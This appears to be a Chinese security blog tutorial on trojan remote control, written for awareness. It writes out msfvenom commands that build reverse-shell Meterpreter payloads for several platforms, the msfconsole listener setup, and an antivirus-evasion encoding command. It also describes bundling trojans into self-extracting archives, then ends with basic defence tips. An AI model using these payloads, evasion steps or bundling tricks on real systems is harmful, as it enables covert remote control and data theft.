浅谈木马

浅谈木马远控

在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。

环境:

攻击者:kali

目标主机:Windows

一、了解木马

1.木马,又称为特洛伊木马

特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。古希腊围攻特洛伊许久却无法攻下,于是有人想到了个办法。制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。到了午夜时分,藏匿于木马中的士兵便打开了城门,四处纵火,城外伏兵涌入,很容易便得到了城池。   在如今,我们常将寄宿在计算机中的未授权的远程控制程序称为特洛伊木马。它可以计算机管理员未发觉的情况下执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。

2.木马原理、结构

原理:特洛伊木马是一道程序,藏匿于计算机中,通过对开启计算机的某一端口进行监听,在接受到数据后进行识别,再对计算机执行相应的操作。

其本质是占用一个端口与攻击者进行通信的网络程序。

结构:

(1)客户端

客户端程序

客户端程序是攻击者的控制台,它负责远程遥控指挥。

(2)服务器端

服务器端程序

服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。

二、制作简易木马

此处我们利用msfvenom制作木马程序。

Windows木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe

81c93fd62f5ca6a8292a0627853587c4.png

-p 载荷(payload),用于反弹shell

lhost=       这里写的是攻击者的IP

lport=       这里写的是攻击者主机上用于监听的端口(任意未被占用的端口)

-f 文件类型

-o 输出的文件名

Linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf

android木马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -o muma.apk

php木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php

python木马

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py

利用msfvenom制作木马时,选择payload和文件类型需要注意。

三、木马的危害

由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。

这里我们直接将制作好的木马放在一个Windows主机中(网络互通),然后在客户端(攻击者)利用msfconsole开启监听

msfconsole

use exploit/multi/handler       #进入监听模块

set payload windows/meterpreter/reverse_tcp       #加载payload模块

set lhost       本机IP

set lport 4444

exploit/run

浅谈木马_第1张图片

开启监听后,我们在目标主机上运行一下木马程序。

21618984d34eb102970b7caf09bc7acd.png

此时我们可以看到已经连接上了木马程序。

当我们的电脑被木马控制后,我们电脑中的信息可能会被泄露,包括系统信息、用户存储在电脑上的数据信息等。

98b725609b087b9e7c1cc684d0e402f8.png

除过电脑上的信息可能会被攻击者窃取,攻击者还可能控制电脑对数据进行删改,可以上传和下载文件,盗取计算机中的密码等操作。甚至可以以感染了木马的主机为跳板,攻击该网络下的其他主机等操作。

可能到了这里有人会觉得这些木马很简单,很容易就被目标发现。

攻击者想要在不被发现的情况下在目标主机上种下木马,可以进行木马捆绑、免杀、伪装等操作。

木马捆绑:

制作自解压木马(准备一个木马、一个图片、一个压缩软件即可)

攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。(当你从一些奇怪的地方下载了一些奇怪的压缩包的时候,可能这个压缩包里面就捆绑了木马,当你一解压,它会自动运行里面的木马程序。)

可能很多时候我们的杀毒软件够强大,可以检测到捆绑了木马的压缩文件。然而攻击者还有方法。

木马免杀:

攻击者可以对木马程序进行一些免杀操作,从而绕过一些防护软件。

常用到的免杀方法有:编码加密、加壳(压缩算法)、利用一些工具进行免杀等。

在利用msfvenom制作木马时,可以使用-e x86/shikata_ganai参数进行加密。

Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe

-e 编码的方式 -i 编码次数 -b不使用十六进制00

一些其他的编码方式,可以使用msfvenom -l encoders命令查看

浅谈木马_第2张图片

四、木马防护

1.木马的传播途径

(1)利用下载进行传播

(2)利用系统漏洞传播

(3)利用邮件传播

(4)利用即使通信传播

(5)利用网页传播

(6)利用蠕虫病毒传播等

2.木马的防范与查杀

(1)首先安装杀毒软件

(2)不执行奇怪的软件,使用的软件尽量从官方下载安装

(3)不随便打开奇怪的邮件

(4)尽量少使用或者不使用共享文件夹

(5)不点击奇怪的链接等

本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨。本文可能会有很多遗漏的地方和不对的地方,欢迎各位大佬指点,文中很多是个人观点,也欢迎各位朋友发表自己的观点看法。

欢迎投稿

CSJH网络安全团队 招收大佬入圈

简历投至[email protected]

                               点赞”、“分享”、“在看”、“收藏

你可能感兴趣的:(python,linux,安全,java,信息安全)